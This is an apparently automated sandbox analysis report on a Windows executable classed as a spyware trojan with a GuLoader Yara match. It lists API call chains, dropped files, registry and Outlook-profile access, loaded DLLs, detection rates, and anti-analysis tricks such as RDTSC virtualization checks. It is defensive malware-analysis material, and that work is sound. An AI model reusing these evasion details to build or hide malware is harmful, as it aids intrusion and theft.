Code function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052F3

Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004032A0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032A0

Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_00404B30	0_2_00404B30
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_00407041	0_2_00407041
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_0040686A	0_2_0040686A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00407041	4_2_00407041
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_0040686A	4_2_0040686A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00404B30	4_2_00404B30
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00154328	4_2_00154328
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00158DA0	4_2_00158DA0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00155F90	4_2_00155F90
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_00152DD1	4_2_00152DD1
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC5761	4_2_36EC5761
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECCCA0	4_2_36ECCCA0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC331B	4_2_36EC331B
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC784D	4_2_36EC784D
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECDEFA	4_2_36ECDEFA
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC6EA0	4_2_36EC6EA0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECC64D	4_2_36ECC64D
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECE79F	4_2_36ECE79F
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC7F18	4_2_36EC7F18
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECB4EC	4_2_36ECB4EC
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECCC8A	4_2_36ECCC8A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECBD88	4_2_36ECBD88
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECDAA2	4_2_36ECDAA2
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECEBF7	4_2_36ECEBF7
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC03CA	4_2_36EC03CA
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECE352	4_2_36ECE352
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC332D	4_2_36EC332D
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECB09A	4_2_36ECB09A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECB07F	4_2_36ECB07F
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36EC7848	4_2_36EC7848
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECF05A	4_2_36ECF05A
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECC1F2	4_2_36ECC1F2
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_36ECB944	4_2_36ECB944
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A8650	4_2_373A8650
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A96C8	4_2_373A96C8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A9D10	4_2_373A9D10
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373ABDF0	4_2_373ABDF0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373AA360	4_2_373AA360
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373ABA97	4_2_373ABA97
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373AA9B0	4_2_373AA9B0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5F10	4_2_373A5F10
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5F01	4_2_373A5F01
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A3F70	4_2_373A3F70
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A3F60	4_2_373A3F60
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A67B0	4_2_373A67B0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A0FA8	4_2_373A0FA8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373AAFF8	4_2_373AAFF8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373AAFF7	4_2_373AAFF7
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A67C0	4_2_373A67C0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A2E10	4_2_373A2E10
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5660	4_2_373A5660
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5650	4_2_373A5650
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A8655	4_2_373A8655
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A36C0	4_2_373A36C0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A2560	4_2_373A2560
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A4DB0	4_2_373A4DB0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A6C18	4_2_373A6C18
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A6C09	4_2_373A6C09
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A1400	4_2_373A1400
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A1CB0	4_2_373A1CB0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A74C8	4_2_373A74C8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A3B18	4_2_373A3B18
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A6368	4_2_373A6368
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A7B65	4_2_373A7B65
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A43C8	4_2_373A43C8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5208	4_2_373A5208
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5207	4_2_373A5207
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A3268	4_2_373A3268
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A5AB8	4_2_373A5AB8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373AF130	4_2_373AF130
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A2108	4_2_373A2108
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A29B8	4_2_373A29B8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A4820	4_2_373A4820
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A7070	4_2_373A7070
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A1858	4_2_373A1858
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_373A0040	4_2_373A0040
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_377DE7C8	4_2_377DE7C8
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_377DD6C1	4_2_377DD6C1
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_377D8328	4_2_377D8328

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: String function: 00402BBF appears 51 times

Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs grrezORe7h.exe
Source: grrezORe7h.exe, 00000004.00000002.3012516628.00000000343E7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs grrezORe7h.exe

Source: grrezORe7h.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/8@5/5

Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_004032A0
Source: C:\Users\user\Desktop\grrezORe7h.exe	Code function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004032A0

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004045B4

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\grrezORe7h.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens

Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\grrezORe7h.exe

File created: C:\Users\user\AppData\Local\Temp\nsuC32C.tmp

Jump to behavior

Source: grrezORe7h.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\grrezORe7h.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: grrezORe7h.exe	ReversingLabs: Detection: 55%
Source: grrezORe7h.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\grrezORe7h.exe

File read: C:\Users\user\Desktop\grrezORe7h.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process created: C:\Users\user\Desktop\grrezORe7h.exe "C:\Users\user\Desktop\grrezORe7h.exe"	Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\grrezORe7h.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Benchership141.lnk.0.dr

LNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor

Source: C:\Users\user\Desktop\grrezORe7h.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: grrezORe7h.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000000.00000002.2135234912.00000000035B7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2989457326.00000000016C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2135234912.0000000002A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub, type: DROPPED

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\grrezORe7h.exe

Code function: 0_2_10002DE0 push eax; ret

0_2_10002E0E

Source: C:\Users\user\Desktop\grrezORe7h.exe

File created: C:\Users\user\AppData\Local\Temp\nsuC465.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\grrezORe7h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\grrezORe7h.exe	API/Special instruction interceptor: Address: 3697192
Source: C:\Users\user\Desktop\grrezORe7h.exe	API/Special instruction interceptor: Address: 2347192

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\grrezORe7h.exe	RDTSC instruction interceptor: First address: 3658E9C second address: 3658E9C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F67646BFB68h 0x00000006 test ch, ah 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\grrezORe7h.exe	RDTSC instruction interceptor: First address: 2308E9C second address: 2308E9C instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F6764F455F8h 0x00000006 test ch, ah 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc

